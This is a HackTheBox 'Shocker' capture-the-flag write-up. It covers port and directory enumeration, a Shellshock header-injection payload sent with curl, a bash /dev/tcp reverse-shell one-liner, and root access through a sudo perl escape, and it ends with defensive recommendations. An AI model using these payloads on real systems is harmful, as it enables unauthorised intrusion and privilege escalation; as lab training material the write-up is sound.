## https://sploitus.com/exploit?id=11E67395-5053-59B0-976E-309242811528
# HackTheBox: Shocker Writeup
A structured and professional walkthrough showcasing the identification and manual exploitation of the critical **Shellshock** vulnerability, followed by local privilege escalation via misconfigured `sudo` rights on a Linux target.
---
## Technical Overview
* **Target OS:** Linux
* **IP Address:** `10.10.10.56`
* **Difficulty:** Easy
* **Core Vulnerabilities:** Shellshock (CVE-2014-6271) & Misconfigured Sudo Privileges (`/usr/bin/perl`)
* **Objective:** Gain initial user access via CGI environment variable injection and escalate to root.
---
## 1. Enumeration & Reconnaissance
The assessment begins with a rapid, full-port TCP SYN scan targeting only open ports (`--open`) while bypassing host discovery (`-Pn`) and DNS resolution (`-n`) to accelerate footprinting.
```bash
nmap -Pn -n -p- -sS --min-rate 5000 --open 10.10.10.56
```
### Targeted Service & Vulnerability Profiling
The initial sweep reveals two active services. We conduct a secondary targeted scan to execute aggressive version detection (`-sCV`) and script-based vulnerability assessment:
```bash
nmap -sCV -p80,2222 --script="safe and vuln" 10.10.10.56
```
### Scan Results
* **Port 80:** HTTP (Apache Web Server)
* **Port 2222:** SSH (Non-standard port)
---
## 2. Directory Fuzzing & Web Enumeration
In parallel with our vulnerability scans, we initiate web directory brute-forcing using `gobuster` to map out hidden resources on the Apache server. We leverage a standard wordlist from the SecLists framework:
```bash
gobuster dir -u [http://10.10.10.56/](http://10.10.10.56/) -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 20
```
### Crucial Finding
The fuzzing process identifies an unindexed **`/cgi-bin/`** directory. In legacy web deployments, Apache servers utilize the Common Gateway Interface (CGI) to execute server-side scripts. Given the machine name and the presence of this folder, we aggressively look for executable scripts (e.g., `.sh`, `.cgi`) that might be susceptible to environmental variable injection flaws.
Further enumeration reveals a script named `user.sh` residing inside the `/cgi-bin/` directory.
---
## 3. Weaponization & Initial Foothold
### Testing for Shellshock (PoC)
The **Shellshock (CVE-2014-6271)** vulnerability allows attackers to execute arbitrary operating system commands by injecting malicious function definitions inside HTTP request headers (such as `User-Agent`) processed by vulnerable Bash instances.
We craft a customized `curl` command to send a Proof of Concept (PoC) payload designed to force the remote system to execute the `/usr/bin/id` command:
```bash
curl -H "User-Agent: () { :; }; echo; /usr/bin/id" [http://10.10.10.56/cgi-bin/user.sh](http://10.10.10.56/cgi-bin/user.sh)
```
* **Result:** The web server responds with the output of the `id` command, validating **authenticated-like unauthenticated Remote Code Execution (RCE)**.
### Establishing a Reverse Shell
To upgrade our execution vector into an interactive session, we establish a local Netcat listener on our attack platform:
```bash
nc -lvnp 4444
```
Next, we inject a native Bash reverse shell string within the malicious `User-Agent` header to force a callback over TCP:
```bash
curl -H "User-Agent: () { :; }; echo; /bin/bash -i >& /dev/tcp//4444 0>&1" [http://10.10.10.56/cgi-bin/user.sh](http://10.10.10.56/cgi-bin/user.sh)
```
Upon successful execution, we receive a stable low-privilege shell:
```bash
$ whoami
shelly
```
---
## 4. Local Privilege Escalation (LPE)
With a functional user context on the system, we audit our local restrictions. We query the `sudo` configuration to determine if the `shelly` user is authorized to execute commands with elevated permissions without supplying a password:
```bash
sudo -l
```
### Sudo Configuration Audit
The output reveals the following high-risk entry:
```text
User shelly may run the following commands on shocker:
(root) NOPASSWD: /usr/bin/perl
```
### Exploiting Perl via GTFOBins
Because we have unrestricted, unauthenticated access to execute the **`perl`** binary as `root`, we can easily break out of the binary restrictions. Cross-referencing **GTFOBins**, we find an execution wrapper that instructs Perl to drop into a native system shell (`/bin/sh`) retaining the execution identity context (`root`):
```bash
sudo -u root perl -e 'exec "/bin/sh"'
```
We immediately achieve full administrative execution context:
```bash
# whoami
root
```
---
## 5. Post-Exploitation & Looting
Now that root access has been established, we navigate to the relevant home directories to retrieve the compromise proofs.
```bash
# Access User Flag
cat /home/shelly/user.txt
# Access Root Flag
cat /root/root.txt
```
---
## Key Takeaways & Defensive Recommendations
1. **Patch Inherently Vulnerable Software:** Shellshock is a legacy, catastrophic vulnerability in GNU Bash. Ensure all server components receive proactive security patches for foundational utilities.
2. **Secure the CGI Environment:** If CGI scripts must be retained, ensure they run under isolated, sandboxed execution models (e.g., using specialized container runtimes or chroot environments) and avoid using outdated, vulnerable default shells.
3. **Enforce Strict Principle of Least Privilege:** Granting standard users unrestricted access to execute powerful built-in interpreters like `perl`, `python`, or `bash` via `sudo` introduces instant escalation vectors. Sudo access should be confined to non-interactive, highly controlled administrative scripts.
```
```